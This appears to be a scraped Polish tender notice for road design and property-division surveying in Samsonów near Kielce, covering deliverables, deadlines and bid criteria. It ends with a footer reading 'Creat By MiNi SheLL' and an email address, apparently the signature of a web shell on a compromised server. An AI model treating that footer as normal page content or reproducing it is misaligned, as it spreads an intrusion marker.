16.Wykonanie projektu stałej organizacji ruchu (uzgodnionego i zaakceptowanego przez  odpowiednie organy).
17. Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
18. Opracowanie tabeli zjazdów (załączonej do projektu wykonawczego).
19. Opracowanie Specyfikacji Technicznej Wykonania i Odbioru Robót.
20. Uzyskanie wszystkich wymaganych decyzji, w tym decyzji środowiskowej(jeżeli jest taka konieczność), pozwoleń, opinii, uzgodnień i sprawdzeń dokumentacji projektowych w zakresie wynikającym z przepisów koniecznych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej oraz realizacji robót objętych zakresem zamawianych dokumentacji.
21. Wykonanie z podziałem na poszczególne branże przedmiarów robót, kosztorysów ślepych 
i kosztorysów inwestorskich wraz z ZZK (zbiorczym zestawieniem kosztów)
22. w oparciu o projekt budowy drogi i ewentualnej przebudowy urządzeń technicznych, projektant wyznaczy linie rozgraniczające pasa drogowego do podziałów oraz granice terenu niezbędnego do czasowego zajęcia dla obiektów budowlanych w przypadku gdy ich przebudowa odbywać się będzie poza wyznaczonym pasem drogowym, w celu przebudowy lub zabezpieczenia infrastruktury technicznej (innym kolorem) wkreślone w projekcie budowlanym i wykonawczym.
II Projekt podziału nieruchomości
1. sporządzenie projektu podziału nieruchomości - 6 egz.;
2. zgłoszenie w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej Starostwa Powiatowego w Kielcach na koszt własny Wykonawcy;
3. wskazanie Zamawiającemu na gruncie nowo wydzielonych nieruchomości;
4. sporządzenie wykazu zmian gruntowych do przeprowadzenia zmian w księgach wieczystych. Wykonawca dostarczy Zamawiającemu zaklauzulowane materiały geodezyjne:
4.1. mapy jednostkowe podziału dla każdej nieruchomości osobno wraz z wykazem zmian gruntowych - 6 egz.;
4.2 wykaz synchronizacyjny w przypadku, gdy w księdze wieczystej  lub w razie jej braku  w innych dokumentach określających stan prawny nieruchomości, nieruchomość podlegająca podziałowi posiada inne oznaczenie i inną powierzchnię niż w katastrze nieruchomości, odrębnie dla każdej nieruchomości - 2 egz.;
4.3. mapa zbiorcza zawierająca projekt podziału nieruchomości wraz z wykazem zmian gruntowych - 6 egz.;
4.4. skrócony wypis hipoteczny - 1 egz.;
4.5. opis topograficzny punktów granicznych, nawiązanych do stałych elementów terenu, pozwalający na ich jednoznaczne wyznaczenie w terenie - 1egz.;
4.6. zarys pomiarowy  1 egz.;
4.7. wykaz współrzędnych geodezyjnych granic pasa drogowego, osnowy geodezyjnej     i współrzędnych działek w pasie drogowym w formacie .dwg na nośniku CD 
i w formie papierowej  po 1egz.
5. w/w materiały geodezyjne nie wykorzystane do uzyskania decyzji o zezwolenie 
na realizację inwestycji drogowej Wykonawca przekaże Zamawiającemu.
6. wyznaczenie i stabilizacja punktów granicznych:
6.1. wszystkie punkty załamania pasa drogowego będą utrwalone betonowymi punktami  granicznymi z wyłączeniem przypadków, gdy granica zostanie ustalona po trwałym ogrodzeniu  po uprawomocnieniu się decyzji o zezwoleniu na realizację inwestycji drogowej;
6.2. punkty przecięcia linii rozgraniczających z granicami działek będą stabilizowane słupkami drewnianymi oznaczonymi jaskrawą farbą;
Zakładany zakres projektowy drogi oraz warunki do projektowania obejmuje załącznik nr 6 do SIWZ


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-2, 71240000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 05/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN WYKONANIA ZADANIA</td><td>20</td></tr><tr><td>DOŚWIADCZENIE PROJEKTANTA BRANŻY DROGOWEJ</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Projekt budowy drogi w msc. Samsonów ul. Rurarnia<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie B  Projekt budowy drogi w msc. Samsonów ul. Rurarnia 
I) Projekt budowlany
1.Wykonanie map dla celów projektowych z uwzględnieniem źródłowej dokumentacji geodezyjnej  celem weryfikacji granic w zakresie niezbędnym do opracowania przedmiotowej dokumentacji w skali 1:500,
2.Opracowanie dokumentacji geotechnicznej  4 egz.
3.Wykonanie operatu i uzyskanie pozwolenia wodnoprawnego na odprowadzenie wód 
z odwodnienia drogi,
4.Uzyskanie  decyzji  o środowiskowych  uwarunkowaniach przedsięwzięcia, 
5.Wykonanie koncepcji projektu wraz z przebudową urządzeń technicznych celem akceptacji przez Zamawiającego.
6.Opracowanie projektu budowlanego i wykonawczego drogi oraz innych projektów koniecznych do przebudowy wszystkich kolidujących sieci i urządzeń infrastruktury technicznej, zgodnie z uzyskanymi przez Wykonawcę warunkami od zarządców sieci, z podziałem na poszczególne  branże wraz ze wszelkimi uzgodnieniami m.in. uzyskanie w imieniu Zamawiającego ostatecznej  decyzji o zezwoleniu na realizację   inwestycji drogowej i dokonanie stosownych zgłoszeń robót  niewymagających pozwolenia na budowę.
7.Długość projektowanej drogi ok. 1130,00 m.;
7.1.Wykonanie projektu odwodnienia z uwzględnieniem  kanalizacji deszczowej, cieku 
przyjezdniowego oraz odbioru wód z odwodnienia drogi wewnętrznej ( dz. nr ewid.2283/9) 
oznaczona symbolem KDW1 w mpzp;     
7.2Umocnienie  rowów odprowadzających wody opadowe z odwodnienia drogi  płytami  chodnikowymi ( spód i boki do wysokości jednej płyty) lub  przyjąć inne  alternatywne 
rozwiązanie;
7.4Rregulacja studzienek kanalizacyjnych (opracowana jest dokumentacja i posiada uzgodniony ZUD- realizacja przed budową inwestycji drogowej;)
7.5.Wykonanie projektu stałej organizacji ruchu;
7.6.Wykonanie projektu chodnika z kostki brukowej koloru czerwonego;
7.7.Wykonanie  projektu zjazdów:
 -  z kostki koloru szarego  na działki i  nieruchomości zabudowane  o szerokości  5 mb,
 -   o nawierzchni  bitumicznej  na drogi oznaczone w mpzp sołectwa  Samsonów  symbolem   KD-Z i KD-L,KDW1,o szerokości 6 mb (zjazd publiczny);
8.Sporządzenie wykazu drzew z podaniem nr  nieruchomości do usunięcia  przypadku 
 zaistniałej takiej  sytuacji;
9. Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
10. Opracowanie tabeli zjazdów (załączonej do projektu wykonawczego);
11. Przebudowa ogrodzeń będących w kolizji z pasem drogowym;
12. Wykonanie projektu  budowy oświetlenia drogowego;
13. Wykonanie  projektu budowy kanalizacji sanitarnej  - załącznik nr 6 b
14. Opracowanie Specyfikacji Technicznej Wykonania i Odbioru Robót;
15. Uzyskanie wszystkich wymaganych decyzji, pozwoleń, opinii, uzgodnień i sprawdzeń 
dokumentacji projektowych w zakresie wynikającym z przepisów koniecznych do uzyskania 
decyzji o zezwoleniu na realizację inwestycji drogowej oraz realizacji robót objętych 
zakresem zamawianych dokumentacji.
16. Wykonanie z podziałem na poszczególne branże przedmiarów robót, kosztorysów ślepych  i kosztorysów inwestorskich wraz ze ZZK (zbiorczym zestawieniem kosztów)
17Sprawowanie nadzoru autorskiego nad inwestycją wykonywaną na podstawie opracowanych dokumentacji projektowych w zakresie wynikającym z art. 20 ust. 4 ustawy z dnia 7 lipca 1994r.  Prawo budowlane oraz inne czynności określone wymaganiami Zamawiającego.
18.W oparciu o projekt przebudowy drogi i przebudowy urządzeń technicznych, projektant  wyznaczy linie rozgraniczające pasa drogowego do podziałów oraz granice terenu    niezbędnego do czasowego zajęcia dla obiektów budowlanych w przypadku gdy ich przebudowa odbywać się będzie poza wyznaczonym pasem drogowym, w celu przebudowy 
lub zabezpieczenia infrastruktury technicznej (innym kolorem) wkreślone w projekcie  budowlanym i wykonawczym. 
19.Zakres projektowanej drogi obejmuje również włączenie do dróg: wojewódzkiej Nr 750 i  powiatowej nr 0437 T  Kielce  Zagnańsk i nr 0298 T Samsonów  Szałas  Odrowąż .

II Projekt podziału nieruchomości
1. Sporządzenie projektu podziału nieruchomości - 6 egz.;
2.Zgłoszenie w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej Starostwa   Powiatowego w Kielcach na koszt własny Wykonawcy;
3.Wskazanie Zamawiającemu na gruncie nowo wydzielonych nieruchomości z udziałem zarządcy drogi;
4.Sporządzenie wykazu zmian gruntowych do przeprowadzenia zmian w księgach wieczystych. Wykonawca dostarczy Zamawiającemu zaklauzulowane materiały geodezyjne:
4.1.Mapy jednostkowe podziału dla każdej nieruchomości wraz z wykazem zmian gruntowych - 5 egz.;
4.2.Wwykaz synchronizacyjny w przypadku, gdy w księdze wieczystej  lub w razie jej braku  w innych dokumentach określających stan prawny nieruchomości, nieruchomość podlegająca podziałowi posiada inne oznaczenie i inną powierzchnię niż w katastrze nieruchomości, odrębnie dla każdej nieruchomości - 2 egz.;
4.3.Mpę zbiorczą zawierającą projekt podziału nieruchomości wraz z wykazem zmian gruntowych - 6 egz.;
4.4. Skrócony wypis hipoteczny - 1 egz.;
4.5. Opis topograficzny punktów granicznych, nawiązanych do stałych elementów terenu, pozwalający na ich jednoznaczne wyznaczenie w terenie - 1egz.;
4.6. Zarys pomiarowy  1 egz.;
4.7. Wykaz współrzędnych geodezyjnych granic pasa drogowego, osnowy geodezyjnej   
i współrzędnych działek w pasie drogowym w formacie dwg na nośniku CD 
i w formie papierowej  po 1egz.
5.W/w materiały geodezyjne nie wykorzystane do uzyskania decyzji o zezwolenie 
na realizację inwestycji drogowej Wykonawca przekaże Zamawiającemu.
6.Wyznaczenie i stabilizacja punktów granicznych:
6.1. Wszystkie punkty załamania pasa drogowego będą utrwalone betonowymi punktami   
granicznymi z wyłączeniem przypadków, gdy granica zostanie ustalona po trwałym 
ogrodzeniu  po uprawomocnieniu się decyzji o zezwoleniu na realizację inwestycji drogowej;
6.2. Punkty przecięcia linii rozgraniczających z granicami działek będą stabilizowane słupkami  drewnianymi oznaczonymi jaskrawą farbą


Zakładany zakres projektowy drogi oraz warunki do projektowania obejmuje załącznik nr 6a do SIWZ

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-2, 71240000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN WYKONANIA ZADANIA</td><td>20</td></tr><tr><td>DOŚWIADCZENIE PROJEKTANTA BRANŻY DROGOWEJ</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com